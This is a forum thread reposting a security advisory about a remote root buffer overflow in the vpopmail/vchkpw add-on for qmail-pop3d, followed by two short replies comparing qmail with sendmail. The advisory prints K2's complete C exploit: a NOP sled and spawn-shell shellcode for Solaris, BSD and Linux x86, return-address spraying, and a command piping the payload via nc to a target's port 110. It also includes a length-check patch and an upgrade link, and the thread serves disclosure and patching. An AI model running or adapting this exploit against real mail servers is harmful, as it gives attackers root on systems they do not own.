Results 1 to 3 of 3

Thread: Qmail Addon exploit!!!

  1. #1
    Antionline's Security Dude instronics's Avatar
    Join Date
    Dec 2002
    Posts
    901

    Lightbulb Qmail Addon exploit!!!

    Dear AO.

    So far qmail has been a very safe mail server, and still continues to be one of my favourites. How ever, an addon for qmail has compromised this security.

    Vpopmail (qmail add-on) is vulnerable to remote root exploit (vpopmail, vchkpw)

    Summary:

    When the vpopmail qmail add-on is installed and used to authenticate user information, a remote attacker may compromise the machine by supplying a long argument to qmail (which passes it to vpopmail). A remote attacker may obtain the privilege level of the authentication module - usually root.

    Details:

    Qmail-pop3d assumes that its password-check mechanism will support the long password that is passed to it. While according to the RFC 1939 (Post Office Protocol version 3) POP-3 passwords should be no longer than 40 characters, qmail supports longer passwords, and therefore it's possible to pass vpopmail (a specific password verification mechanism) passwords which are longer than it expects - causing a buffer overflow.

    Vulnerable systems:
    All VPopmail versions prior to VPopmail 3.4.11j.

    Immune systems:
    VPopmail 3.4.11j

    Exploit:
    /*
    qmail-qpop3d-vchkpw.c (v.3)
    by: K2,

    The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
    has big problems ;)

    gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
    ( ./vpop [offset] [alignment] ; cat ) | nc target.com 110

    play with the alignment to get it to A) crash B) work.
    qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
    Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
    vpopmail-3.4.10a/vpopmail-3.4.11[b-e]

    Hi plaguez.
    prop's to Interrupt for testing with bsd, _eixon an others ;)
    cheez shell's :)
    THX goes out to STARBUCKS*!($#!
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define SIZE 260
    #define NOP 0x90
    #ifdef SX86
    #define DEFOFF 0x8047cfc
    #define NOPDEF 75
    #elif BSD
    #define DEFOFF 0xbfbfdbbf
    #define NOPDEF 81
    #else
    #define DEFOFF 0xbffffcd8
    #define NOPDEF 81
    #endif

    char *shell =
    #ifdef SX86 // Solaris IA32 shellcode, cheez
    "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
    "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
    "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
    "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
    "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
    "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
    #elif BSD // fBSD shellcode, mudge@l0pht.com
    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
    "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
    #else // Linux shellcode, no idea
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh\xff";
    #endif

    int main(int argc, char **argv)
    {
    int i=0,esp=0,offset=0,nop=NOPDEF;
    char buffer[SIZE];

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtol(argv[2], NULL, 0);

    esp = DEFOFF;

    memset(buffer, NOP, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
    *((int *) &buffer[i]) = esp+offset;
    }

    printf("user %s\n",buffer);
    printf("pass ADMR0X&*!(#&*(!\n");

    fprintf(stderr,"\nbuflen = %d, nops = %d, target = 0x%x\n\n",strlen(buffer),nop,esp+offset);
    return(0);
    }

    Patch:
    --- qmail-1.03/qmail-popup.c Mon Jun 15 03:53:16 1998
    +++ qmail-1.03-patch/qmail-popup.c Fri Jan 21 13:00:18 2000
    @@ -13,6 +13,8 @@
    #include "readwrite.h"
    #include "timeoutread.h"
    #include "timeoutwrite.h"
    +#include <unistd.h>
    +#include <syslog.h>

    void die() { _exit(1); }

    @@ -87,6 +89,24 @@
    int child;
    int wstat;
    int pi[2];
    +
    + /*
    + This patch should have minimal impact of normal qmail operations.
    + It was coded/tested under linux, but should work most everywhere.
    + */
    +
    + if(strlen(user) >= 40)
    + {
    + syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user));
    + user[39]='\0';
    + userlen=strlen(user);
    + }
    +
    + if(strlen(pass) >= 40)
    + {
    + syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(pass));
    + pass[39]='\0';
    + }

    if (fd_copy(2,1) == -1) die_pipe();
    close(3);


    Download the latest version of vpopmail from: http://www.inter7.com/vpopmail/

    The information was provided by: k2.

    I hope this information comes in handy for people using qmail with the vpopmail addon.


    Cheers.
    Ubuntu-: Means in African : "Im too dumb to use Slackware"

  2. #2
    Senior Member
    Join Date
    Oct 2001
    Posts
    186
    Thanks for the information because I was thinking about running Q mail as an alternative to sendmail. I had'nt heard of this addon but now I believe I'll look into it.
    Ben Franklin said it best. \"They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.\"

  3. #3
    Antionline's Security Dude instronics's Avatar
    Join Date
    Dec 2002
    Posts
    901
    Do not misunderstand it. Qmail is a very safe mail server. The weakness applies for this specific addon. I prefer Qmail instead of sendmail. Sendmail is known to get exploited very often.

    Cheers.
    Ubuntu-: Means in African : "Im too dumb to use Slackware"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •